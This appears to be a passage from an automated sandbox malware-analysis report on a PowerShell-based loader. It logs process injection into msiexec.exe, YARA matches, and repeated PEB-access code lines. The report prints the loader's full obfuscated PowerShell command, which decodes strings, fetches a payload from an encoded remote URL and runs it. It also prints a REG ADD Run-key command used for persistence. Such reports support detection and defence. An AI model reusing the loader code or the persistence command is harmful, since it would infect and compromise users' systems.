              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD07A80 mov eax, dword ptr fs:[00000030h]8_2_1FD07A80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD07A80 mov eax, dword ptr fs:[00000030h]8_2_1FD07A80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD07A80 mov eax, dword ptr fs:[00000030h]8_2_1FD07A80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1EA80 mov eax, dword ptr fs:[00000030h]8_2_1FD1EA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1EA80 mov eax, dword ptr fs:[00000030h]8_2_1FD1EA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1EA80 mov eax, dword ptr fs:[00000030h]8_2_1FD1EA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1EA80 mov eax, dword ptr fs:[00000030h]8_2_1FD1EA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1EA80 mov eax, dword ptr fs:[00000030h]8_2_1FD1EA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1EA80 mov eax, dword ptr fs:[00000030h]8_2_1FD1EA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1EA80 mov eax, dword ptr fs:[00000030h]8_2_1FD1EA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1EA80 mov eax, dword ptr fs:[00000030h]8_2_1FD1EA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1EA80 mov eax, dword ptr fs:[00000030h]8_2_1FD1EA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDCFA87 mov eax, dword ptr fs:[00000030h]8_2_1FDCFA87
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDE4A80 mov eax, dword ptr fs:[00000030h]8_2_1FDE4A80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1BAA0 mov eax, dword ptr fs:[00000030h]8_2_1FD1BAA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1BAA0 mov eax, dword ptr fs:[00000030h]8_2_1FD1BAA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD18AA0 mov eax, dword ptr fs:[00000030h]8_2_1FD18AA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD18AA0 mov eax, dword ptr fs:[00000030h]8_2_1FD18AA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD66AA4 mov eax, dword ptr fs:[00000030h]8_2_1FD66AA4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD0FAA4 mov ecx, dword ptr fs:[00000030h]8_2_1FD0FAA4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDBDAAC mov ecx, dword ptr fs:[00000030h]8_2_1FDBDAAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDBDAAC mov ecx, dword ptr fs:[00000030h]8_2_1FDBDAAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDBDAAC mov eax, dword ptr fs:[00000030h]8_2_1FDBDAAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3DAAE mov eax, dword ptr fs:[00000030h]8_2_1FD3DAAE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD16A50 mov eax, dword ptr fs:[00000030h]8_2_1FD16A50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD16A50 mov eax, dword ptr fs:[00000030h]8_2_1FD16A50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD16A50 mov eax, dword ptr fs:[00000030h]8_2_1FD16A50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD16A50 mov eax, dword ptr fs:[00000030h]8_2_1FD16A50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD16A50 mov eax, dword ptr fs:[00000030h]8_2_1FD16A50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD16A50 mov eax, dword ptr fs:[00000030h]8_2_1FD16A50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD16A50 mov eax, dword ptr fs:[00000030h]8_2_1FD16A50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD20A5B mov eax, dword ptr fs:[00000030h]8_2_1FD20A5B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD20A5B mov eax, dword ptr fs:[00000030h]8_2_1FD20A5B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD09A40 mov ecx, dword ptr fs:[00000030h]8_2_1FD09A40
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDA3A78 mov eax, dword ptr fs:[00000030h]8_2_1FDA3A78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDA3A78 mov eax, dword ptr fs:[00000030h]8_2_1FDA3A78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDA3A78 mov eax, dword ptr fs:[00000030h]8_2_1FDA3A78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDA3A78 mov eax, dword ptr fs:[00000030h]8_2_1FDA3A78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDA3A78 mov eax, dword ptr fs:[00000030h]8_2_1FDA3A78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDA3A78 mov eax, dword ptr fs:[00000030h]8_2_1FDA3A78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD8CA72 mov eax, dword ptr fs:[00000030h]8_2_1FD8CA72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD8CA72 mov eax, dword ptr fs:[00000030h]8_2_1FD8CA72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD4CA6F mov eax, dword ptr fs:[00000030h]8_2_1FD4CA6F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD4CA6F mov eax, dword ptr fs:[00000030h]8_2_1FD4CA6F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD4CA6F mov eax, dword ptr fs:[00000030h]8_2_1FD4CA6F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD0BA10 mov eax, dword ptr fs:[00000030h]8_2_1FD0BA10
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD9CA11 mov eax, dword ptr fs:[00000030h]8_2_1FD9CA11
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD39A18 mov ecx, dword ptr fs:[00000030h]8_2_1FD39A18
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD45A01 mov eax, dword ptr fs:[00000030h]8_2_1FD45A01
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD45A01 mov ecx, dword ptr fs:[00000030h]8_2_1FD45A01
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD45A01 mov eax, dword ptr fs:[00000030h]8_2_1FD45A01
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD45A01 mov eax, dword ptr fs:[00000030h]8_2_1FD45A01
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDCFA02 mov eax, dword ptr fs:[00000030h]8_2_1FDCFA02
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1BA30 mov eax, dword ptr fs:[00000030h]8_2_1FD1BA30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1BA30 mov ecx, dword ptr fs:[00000030h]8_2_1FD1BA30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1BA30 mov eax, dword ptr fs:[00000030h]8_2_1FD1BA30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1BA30 mov eax, dword ptr fs:[00000030h]8_2_1FD1BA30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1BA30 mov eax, dword ptr fs:[00000030h]8_2_1FD1BA30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1BA30 mov eax, dword ptr fs:[00000030h]8_2_1FD1BA30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD34A35 mov eax, dword ptr fs:[00000030h]8_2_1FD34A35
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD34A35 mov eax, dword ptr fs:[00000030h]8_2_1FD34A35
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD4CA24 mov eax, dword ptr fs:[00000030h]8_2_1FD4CA24
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3DA20 mov eax, dword ptr fs:[00000030h]8_2_1FD3DA20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3DA20 mov eax, dword ptr fs:[00000030h]8_2_1FD3DA20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3EA2E mov eax, dword ptr fs:[00000030h]8_2_1FD3EA2E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDEB9DF mov eax, dword ptr fs:[00000030h]8_2_1FDEB9DF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDEB9DF mov eax, dword ptr fs:[00000030h]8_2_1FDEB9DF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1A9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD1A9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1A9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD1A9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1A9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD1A9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1A9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD1A9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1A9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD1A9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1A9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD1A9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3D9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD3D9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3D9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD3D9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3D9D0 mov esi, dword ptr fs:[00000030h]8_2_1FD3D9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3D9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD3D9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3D9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD3D9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3D9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD3D9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3D9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD3D9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3D9D0 mov eax, dword ptr fs:[00000030h]8_2_1FD3D9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD449D0 mov eax, dword ptr fs:[00000030h]8_2_1FD449D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDDA9D3 mov eax, dword ptr fs:[00000030h]8_2_1FDDA9D3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD159C0 mov eax, dword ptr fs:[00000030h]8_2_1FD159C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD159C0 mov eax, dword ptr fs:[00000030h]8_2_1FD159C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD159C0 mov eax, dword ptr fs:[00000030h]8_2_1FD159C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD159C0 mov eax, dword ptr fs:[00000030h]8_2_1FD159C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD429F9 mov eax, dword ptr fs:[00000030h]8_2_1FD429F9

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_6776.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6776, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3488, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2E00000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#collybia journalisation utugtsforhold muttonbird motoriserende #><#alkyder ekstinktion frdigpakkende institutionalise ombrometer ttl arketype #>$penthiophen='uninterviewed';function manned($presubmitting){if ($host.debuggerenabled) {$rep=5} for ($energibehov=$rep;;$energibehov+=6){if(!$presubmitting[$energibehov]) { break }$verdour+=$presubmitting[$energibehov]}$verdour}function svaj($angloamerikanske){ .($spredningseffekter) ($angloamerikanske)}$dichlorvos45=manned 'pa klnn.nacemisrotarene.prerewch laemuscabwrestcambasl samli saneesprjtnpickwt';$officershlene=manned ' granm.ffenovoro zsu arikompalhespelskarpakasse/';$kanaljens=manned 'vrftetflyoflbeatssrepol1perve2';$abjectnesses='unrea[sacc.ndeliresubprtschoo. agtsshudsoesta frbrugevimporienscocproagepectipempieooutfoi begnnurocetbo aim adi alutrenafnataunlusgin uietopvirbe ri]minut:bully:lamensjord edaivacscia ubusbarvapori lyntmilliy narkp tilrrvindeopro,rtmicroomell cisocloelectldomor=flle,$ lod kwipinafagg nstadsabrilll par jhaiduedistrnlatins';$officershlene+=manned ' ega5jocum.slamb0rnner folk(shrewwscaveiaflukngunnidbe jeoo nubwpl ntscatec lovmenorlo,tsteni unexi1 cadd0 belg.disen0 ilba;l gtu kvartwyac tifodbona ino6dy,sv4filac;tipon smashxdissa6styre4fr tr; u de purpur kbehvlygae:fl es1re er3 ence1falte.gas,r0svamp)xer d raadgsib sereob ceup okkeithounsur/apost2 ipv0klubc1manag0bavar0citro1sekre0pena 1 alli procafcytobispiserundeseko muf v,tiocontixragee/f ann1nonte3corms1bew,l. kalv0';$myoalbumose=manned ',lipsudelirsla dseindelrsingu- amebatidewgihuk.eagoninmirint';$enarration=manned 'clockh litot skrutstormparkitstippe: tare/bi,li/interh uncoehaor.arestrv do eypaleoe wagoqcrys.uhpsteialt ipu aarm s,eeefilten n njtcorkes kredarattll mephe rhi sshala.cozedagableuethic/ lycasensod f ulmgr,teielektn orga/musicvlerpfedj elrm ndidprepoepro rnmoralss licamanagl desitex os.agg,oaoutfis realinavel>j.ribhserbetnonr,tun lop sjlss in.r: f.br/dori./bedliqlig.tp pugh.fdselltysseq twaza relae mellbis gnokorve2foret. ethnrgraziutovtr.grun.cvrdi oubanemrelax/forewa procdregnsmla ysikroejnabjur/pandevforlae .iderophredrenkuegra nn sinnszemayasubjulparaltt.rmi.epigea e.onsunciri';$alerion194=manned 'brand>';$spredningseffekter=manned 'shiftitwi tepolysx';$dioxinbegrnsning='esthesiogen';$oprykningerne3='\fakers.spo';svaj (manned ' resh$ akupgun,selantigounc.hbly kradeprel li a:rekreeafluskcyanestuatht outvr elwiatwofekhovedtunven=resel$indfle outfnelodevsouag: hedeastrucphyp rpgraendopvura r sstvide adel.b+etrus$opst.onon opobserrbegroystatskregaun brugihomofneftergfragmestudirtouchnsustaefrede3');svaj (manned 'vasoc$congeg,caralrespeoko sfb speea egoml fr t:rep skangellmirdaba.isteinhabsknaphtmoseyrcoralifuldgmre umlavnesevanddnmarty1frogf1astou5beska= krat$ryalaeudsagnkontrak oenrenamirafterake,attpty.lirodenotita n ildk.blazosostrepdobbel ransiudskatscabb(retal$pompoazonullsp
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#collybia journalisation utugtsforhold muttonbird motoriserende #><#alkyder ekstinktion frdigpakkende institutionalise ombrometer ttl arketype #>$penthiophen='uninterviewed';function manned($presubmitting){if ($host.debuggerenabled) {$rep=5} for ($energibehov=$rep;;$energibehov+=6){if(!$presubmitting[$energibehov]) { break }$verdour+=$presubmitting[$energibehov]}$verdour}function svaj($angloamerikanske){ .($spredningseffekter) ($angloamerikanske)}$dichlorvos45=manned 'pa klnn.nacemisrotarene.prerewch laemuscabwrestcambasl samli saneesprjtnpickwt';$officershlene=manned ' granm.ffenovoro zsu arikompalhespelskarpakasse/';$kanaljens=manned 'vrftetflyoflbeatssrepol1perve2';$abjectnesses='unrea[sacc.ndeliresubprtschoo. agtsshudsoesta frbrugevimporienscocproagepectipempieooutfoi begnnurocetbo aim adi alutrenafnataunlusgin uietopvirbe ri]minut:bully:lamensjord edaivacscia ubusbarvapori lyntmilliy narkp tilrrvindeopro,rtmicroomell cisocloelectldomor=flle,$ lod kwipinafagg nstadsabrilll par jhaiduedistrnlatins';$officershlene+=manned ' ega5jocum.slamb0rnner folk(shrewwscaveiaflukngunnidbe jeoo nubwpl ntscatec lovmenorlo,tsteni unexi1 cadd0 belg.disen0 ilba;l gtu kvartwyac tifodbona ino6dy,sv4filac;tipon smashxdissa6styre4fr tr; u de purpur kbehvlygae:fl es1re er3 ence1falte.gas,r0svamp)xer d raadgsib sereob ceup okkeithounsur/apost2 ipv0klubc1manag0bavar0citro1sekre0pena 1 alli procafcytobispiserundeseko muf v,tiocontixragee/f ann1nonte3corms1bew,l. kalv0';$myoalbumose=manned ',lipsudelirsla dseindelrsingu- amebatidewgihuk.eagoninmirint';$enarration=manned 'clockh litot skrutstormparkitstippe: tare/bi,li/interh uncoehaor.arestrv do eypaleoe wagoqcrys.uhpsteialt ipu aarm s,eeefilten n njtcorkes kredarattll mephe rhi sshala.cozedagableuethic/ lycasensod f ulmgr,teielektn orga/musicvlerpfedj elrm ndidprepoepro rnmoralss licamanagl desitex os.agg,oaoutfis realinavel>j.ribhserbetnonr,tun lop sjlss in.r: f.br/dori./bedliqlig.tp pugh.fdselltysseq twaza relae mellbis gnokorve2foret. ethnrgraziutovtr.grun.cvrdi oubanemrelax/forewa procdregnsmla ysikroejnabjur/pandevforlae .iderophredrenkuegra nn sinnszemayasubjulparaltt.rmi.epigea e.onsunciri';$alerion194=manned 'brand>';$spredningseffekter=manned 'shiftitwi tepolysx';$dioxinbegrnsning='esthesiogen';$oprykningerne3='\fakers.spo';svaj (manned ' resh$ akupgun,selantigounc.hbly kradeprel li a:rekreeafluskcyanestuatht outvr elwiatwofekhovedtunven=resel$indfle outfnelodevsouag: hedeastrucphyp rpgraendopvura r sstvide adel.b+etrus$opst.onon opobserrbegroystatskregaun brugihomofneftergfragmestudirtouchnsustaefrede3');svaj (manned 'vasoc$congeg,caralrespeoko sfb speea egoml fr t:rep skangellmirdaba.isteinhabsknaphtmoseyrcoralifuldgmre umlavnesevanddnmarty1frogf1astou5beska= krat$ryalaeudsagnkontrak oenrenamirafterake,attpty.lirodenotita n ildk.blazosostrepdobbel ransiudskatscabb(retal$pompoazonullsp
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "socialpolitikken" /t reg_expand_sz /d "%valgdagen% -windowstyle 1 $undertakerish=(gp -path 'hkcu:\software\nutrias\').esponton;%valgdagen% ($undertakerish)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#collybia journalisation utugtsforhold muttonbird motoriserende #><#alkyder ekstinktion frdigpakkende institutionalise ombrometer ttl arketype #>$penthiophen='uninterviewed';function manned($presubmitting){if ($host.debuggerenabled) {$rep=5} for ($energibehov=$rep;;$energibehov+=6){if(!$presubmitting[$energibehov]) { break }$verdour+=$presubmitting[$energibehov]}$verdour}function svaj($angloamerikanske){ .($spredningseffekter) ($angloamerikanske)}$dichlorvos45=manned 'pa klnn.nacemisrotarene.prerewch laemuscabwrestcambasl samli saneesprjtnpickwt';$officershlene=manned ' granm.ffenovoro zsu arikompalhespelskarpakasse/';$kanaljens=manned 'vrftetflyoflbeatssrepol1perve2';$abjectnesses='unrea[sacc.ndeliresubprtschoo. agtsshudsoesta frbrugevimporienscocproagepectipempieooutfoi begnnurocetbo aim adi alutrenafnataunlusgin uietopvirbe ri]minut:bully:lamensjord edaivacscia ubusbarvapori lyntmilliy narkp tilrrvindeopro,rtmicroomell cisocloelectldomor=flle,$ lod kwipinafagg nstadsabrilll par jhaiduedistrnlatins';$officershlene+=manned ' ega5jocum.slamb0rnner folk(shrewwscaveiaflukngunnidbe jeoo nubwpl ntscatec lovmenorlo,tsteni unexi1 cadd0 belg.disen0 ilba;l gtu kvartwyac tifodbona ino6dy,sv4filac;tipon smashxdissa6styre4fr tr; u de purpur kbehvlygae:fl es1re er3 ence1falte.gas,r0svamp)xer d raadgsib sereob ceup okkeithounsur/apost2 ipv0klubc1manag0bavar0citro1sekre0pena 1 alli procafcytobispiserundeseko muf v,tiocontixragee/f ann1nonte3corms1bew,l. kalv0';$myoalbumose=manned ',lipsudelirsla dseindelrsingu- amebatidewgihuk.eagoninmirint';$enarration=manned 'clockh litot skrutstormparkitstippe: tare/bi,li/interh uncoehaor.arestrv do eypaleoe wagoqcrys.uhpsteialt ipu aarm s,eeefilten n njtcorkes kredarattll mephe rhi sshala.cozedagableuethic/ lycasensod f ulmgr,teielektn orga/musicvlerpfedj elrm ndidprepoepro rnmoralss licamanagl desitex os.agg,oaoutfis realinavel>j.ribhserbetnonr,tun lop sjlss in.r: f.br/dori./bedliqlig.tp pugh.fdselltysseq twaza relae mellbis gnokorve2foret. ethnrgraziutovtr.grun.cvrdi oubanemrelax/forewa procdregnsmla ysikroejnabjur/pandevforlae .iderophredrenkuegra nn sinnszemayasubjulparaltt.rmi.epigea e.onsunciri';$alerion194=manned 'brand>';$spredningseffekter=manned 'shiftitwi tepolysx';$dioxinbegrnsning='esthesiogen';$oprykningerne3='\fakers.spo';svaj (manned ' resh$ akupgun,selantigounc.hbly kradeprel li a:rekreeafluskcyanestuatht outvr elwiatwofekhovedtunven=resel$indfle outfnelodevsouag: hedeastrucphyp rpgraendopvura r sstvide adel.b+etrus$opst.onon opobserrbegroystatskregaun brugihomofneftergfragmestudirtouchnsustaefrede3');svaj (manned 'vasoc$congeg,caralrespeoko sfb speea egoml fr t:rep skangellmirdaba.isteinhabsknaphtmoseyrcoralifuldgmre umlavnesevanddnmarty1frogf1astou5beska= krat$ryalaeudsagnkontrak oenrenamirafterake,attpty.lirodenotita n ildk.blazosostrepdobbel ransiudskatscabb(retal$pompoazonullspJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "socialpolitikken" /t reg_expand_sz /d "%valgdagen% -windowstyle 1 $undertakerish=(gp -path 'hkcu:\software\nutrias\').esponton;%valgdagen% ($undertakerish)"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
